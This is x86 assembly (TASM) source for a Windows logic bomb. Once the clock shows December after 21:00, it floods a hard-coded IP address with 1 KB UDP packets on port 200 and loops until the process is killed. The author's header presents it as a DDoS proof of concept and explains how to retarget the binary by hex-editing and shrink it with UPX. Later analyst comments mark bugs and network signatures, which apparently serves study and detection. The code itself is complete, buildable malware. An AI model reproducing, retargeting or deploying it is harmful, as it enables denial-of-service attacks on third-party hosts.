UDPer is a logic bomb written in x86 assembly (TASM) for Windows that floods a hard-coded target address with UDP packets once a date-and-time condition is met.
51b9a0b285efad03f7affe599d3191b523a7c8d338e58191576976773663182a
; Frost_Byte [S/I] Saturday, July 22nd, 2000
;---------------Main Ramblings---------------
; The following code is a demonstration of an idea which I have
; had for quite a while, but never felt like sitting down and typing
; out. One of the problems with the DDOS servers is that commands are
; sent back and forth, but what if the Logic Bomb ideals were used to
; make basically a "ticking timebomb" ready to pounce on a site when
; certain conditions are met? The further away the attack is set...the
; more systems would be acquired. In turn, the longer the binaries are
; floating about, there is a higher probability that the code will be
; found and preventative measures will be taken. All I am doing is presenting
; this idea and a simple demonstration. The file loads, checks to see if
; it is December, and after 10:00 pm. If so...the attack ensues. It sends
; 10 1K packets (which are the first 1K of the Executable itself..just for
; kicks, heh). Then, the program waits 30 seconds, and tries again. At
; any error (such as not being able to initialize winsock) it jumps to the 30
; second wait. Basically, the program continuously loops until the process is
; killed. I incorporated no API-call hiding, Re-starting on boot, or Process
; hiding methods...this is just proof of what could be done. Also, by the
; allocating of bytes..one EXE can be hexedited for a different IP to attack,
; and the file can be compressed (UPX threw it down to about 3K). This was tried
; on my Winnt 4 box to attack a Linux box over my LAN, and it seemed relatively
; stable and wasn't a real RAM-hog. BTW...hope you enjoy the commenting...
;-------------Hello Hello-------------
; I'm going to give a hello to Miss Ashley, A^T (thanks for catching a packet for me),
; and to my new gf Miss Jill.
;-------------Up-and-coming items-------------
; Have a Binder/Stub about 75% complete that has a 2-4K stub....a Commandprompt redirector
; in TASM, and other numerous odds and ends....
;-------------Outwards Out Words....-------------
; I'd just like to thank you for at least looking at this article, and I look forward to
; bringing more ideas to light. Later oh...
;-----Compiling-----
; tasm /mx /m1 UDPer
; tlink32 -Tpe -aa -c -x UDPer,,,import32.lib
;------------------------------------------------------------------------------------
;--------------------------------------The-Code--------------------------------------
;------------------------------------------------------------------------------------
.386
locals
jumps
.model Flat ,StdCall
;----------\Structures\----------
; WSAdata: layout of the buffer handed to WSAStartup (instantiated in the
; data section as WSAdats). None of its fields are read by the code shown.
; NOTE(review): szDescription and szSystemStatus are declared as single
; bytes here, whereas the Winsock WSADATA structure holds character arrays
; in those positions. WSAStartup may therefore write past the end of this
; buffer into the data that follows it - confirm against winsock.h.
WSAdata STRUC
wVersion dw ?
wHighVersion dw ?
szDescription db ?
szSystemStatus db ?
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?,?
WSAdata ENDS
; sockaddr_in: IPv4 socket address passed to bind() and sendto().
; Size is 2 + 2 + 4 + 8 = 16 bytes, the value of sockaddr_size (010h).
sockaddr_in STRUC
sin_family dw ?                 ; address family; the code stores 002h (AF_INET)
sin_port dw ?                   ; port, stored as returned by htons()
sin_addr dd 0                   ; IPv4 address (INADDR_ANY or inet_addr() result)
sin_zero db 8 dup (0)           ; padding up to 16 bytes
sockaddr_in ENDS
; SYSTEMTIME: eight 16-bit fields filled in by GetLocalTime.
; Only wMonth and wHour are read by the code shown; the year and the day
; are never compared.
SYSTEMTIME STRUC
wYear dw ?
wMonth dw ?                     ; compared against 12 by the trigger check
wDayOfWeek dw ?
wDay dw ?
wHour dw ?                      ; compared against 20 by the trigger check
wMinute dw ?
wSecond dw ?
wMilliseconds dw ?
SYSTEMTIME ENDS
;----------/Structures/----------
;----------\API Declarations\----------
; API for Logic Bomb data
extrn GetLocalTime:PROC
extrn Sleep:PROC
; Winsock API calls
extrn WSAStartup:PROC
extrn WSACleanup:PROC
extrn htons:PROC
extrn bind:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn sendto:PROC
extrn closesocket:PROC
;----------/API Declarations/----------
.Data
;----------\Winsock-used Data\----------
WSAdats WSADATA ?               ; buffer handed to WSAStartup
sin1 sockaddr_in ?              ; local address used for bind()
sin2 sockaddr_in ?              ; destination address used for sendto()
INADDR_ANY equ 000000000h       ; bind to any local interface
sockaddr_size equ 010h          ; 16 = size of sockaddr_in
saddr_len dw 16                 ; not referenced by the code shown
MySocket dd 0                   ; socket handle returned by socket()
;----------/Winsock-used Data/----------
MySysTime SYSTEMTIME ?          ; filled by GetLocalTime on every pass
; Target address, kept as a plain ASCII dotted-quad string and parsed with
; inet_addr at run time. Analyst note: in an unpacked sample this is a
; NUL-padded 16-byte field in the data section, so the configured target
; can be read straight out of the file (the header notes mention UPX
; packing, in which case the sample has to be unpacked first).
AttackedAddr db '127.0.0.1' ; as shipped, the target is localhost
db 7 dup (0) ; NUL padding: 9 + 7 = 16 bytes in total
; enough for xxx.xxx.xxx.xxx plus the terminating NUL
.Code
; Program entry point (Start_Code) and top of the endless retry loop
; (startsocks). Every pass starts Winsock, creates a UDP socket and binds
; it before the date check is made, so a running sample repeats this
; setup/teardown sequence roughly every 30 seconds even when nothing is
; being sent - a host-side behaviour that can be observed at any time of
; year.
Start_Code:
startsocks:
;----------\Socket initialization & Configuration\----------
call WSAStartup, 0202h, offset WSAdats ; Initialize Winsock, version word 0202h
cmp eax,-1                      ; only a return value of -1 is treated as failure
jz error
call socket, 002h, 002h, 011h ; Socket ( AF_INET , SOCK_DGRAM , IPPROTO_UDP)
test eax,eax
jb error                        ; NOTE(review): TEST clears CF, so this branch is never taken
mov MySocket, eax
call htons, eax ; the socket handle value is reused as the local port number
mov [sin1.sin_port],ax ; low 16 bits of the htons() result become the source
mov [sin1.sin_family],002h ; port; family is AF_INET
mov [sin1.sin_addr],INADDR_ANY
call bind, MySocket, offset sin1, sockaddr_size
cmp eax,-1
jz error                        ; bind failed: clean up and wait 30 s
call htons, 200 ; destination UDP port is fixed at 200
mov [sin2.sin_port],ax ; sin2 is the destination address handed to sendto
mov [sin2.sin_family],002h ; AF_INET
call inet_addr, offset AttackedAddr ; parse the dotted-quad target string
mov [sin2.sin_addr],eax         ; result is stored without being checked
;----------/Socket initialization & Configuration/----------
;----------\Logic Bomb\----------
; Trigger check against the host's local clock. Sending happens only when
; wMonth == 12 and wHour > 20; the year and day are not examined, so the
; condition holds every December. Analyst note: outside that window the
; sample produces no network traffic at all, only the periodic socket
; setup and teardown, so a dynamic-analysis run with an unmodified clock
; can look benign.
call GetLocalTime, offset MySysTime
cmp MySysTime.wMonth, 12 ; Is it the 12th month (Dec)?
jnz error ; If not, skip sending and go to the 30 s wait
cmp MySysTime.wHour, 20 ; wHour is in 24-hour form
jle error ; continues only for wHour > 20, i.e. from 21:00 local
; time onward - not 22:00 as the header text states
;----------/Logic Bomb/----------
;----------\The UDP Bomb\----------
; Sends up to 10 datagrams of 1024 bytes each to sin2 (AttackedAddr, UDP
; port 200), pausing 500 ms after each one. The payload is read from
; memory starting at the Start_Code label, i.e. the program's own code
; bytes rather than the start of the file as the header text says.
; Analyst note: the payload is therefore constant for a given build, which
; together with the fixed size, port and timing gives a usable network
; signature.
xor ecx,ecx                     ; ecx = packets sent so far
Looper:
inc ecx
push ecx                        ; keep the counter across the API calls
call sendto, MySocket, offset Start_Code, 1024, 0, offset sin2, sockaddr_size ; 1024 bytes from Start_Code
cmp eax,-1 ; -1 = send failed
jz error                        ; NOTE(review): taken with the pushed ecx still on the stack
call Sleep, 500 ; 500 ms pause between datagrams
pop ecx
cmp ecx,10
jnz Looper ; repeat until 10 datagrams have been sent,
; then fall through into the cleanup and
; 30 s wait at the error label
;
;----------\The UDP Bomb\----------
; Common tail for every pass: reached on any failure, when the date check
; is not satisfied, and by fall-through after a complete burst of 10
; datagrams. It closes the socket, shuts Winsock down, sleeps 30 seconds
; and starts over. There is no exit path; the loop runs until the process
; is terminated.
error:
call closesocket, MySocket
call WSAcleanup
call Sleep, 30000 ; 30 s idle between passes
jmp startsocks ; unconditional restart of the whole sequence
End Start_Code ; Start_Code is the program entry point
End
;-------------------------------------------------------------------------------
;-------------------------------------------------------------------------------
;-------------------------------------------------------------------------------